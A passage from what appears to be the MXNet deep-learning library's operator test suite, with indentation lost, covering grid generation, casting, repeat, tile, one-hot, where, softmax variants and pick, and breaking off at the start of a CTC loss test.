out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est, rtol=1e-3, atol=1e-5)
# check addto
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy, rtol=1e-2, atol=1e-5)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid.simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
@with_seed()
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
@with_seed()
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y.simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
assert exe.outputs[0].dtype == dsttype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
@with_seed()
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
assert exe.outputs[0].dtype == np.float16
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
if default_context().device_type == 'gpu':
check_cast(mx.sym.amp_cast, input_np, expected_output)
@with_seed()
def test_amp_multicast():
if default_context().device_type == 'cpu':
return
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
@with_seed()
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z.bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z.bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
@with_seed()
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
@with_seed()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
@with_seed()
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
@with_seed()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
@with_seed()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int32)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx)
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx)
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
assert(expect_out.all() == out.all())
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
@with_seed()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
@with_seed()
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
@with_seed()
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)], rtol=1e-3, atol=1e-4)
check_numeric_gradient(sym, [data], rtol=1e-1, atol=1e-2)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1.bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_seed()
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
import sys
is_windows = sys.platform.startswith('win')
enforce_safe_acc = os.environ.get("MXNET_SAFE_ACCUMULATION", "0")
if not is_windows or enforce_safe_acc == "1":
os.environ["MXNET_SAFE_ACCUMULATION"] = "1"
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
@with_seed()
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
@with_seed()
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0].copy()
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest, outTrain)
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
@with_seed()
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
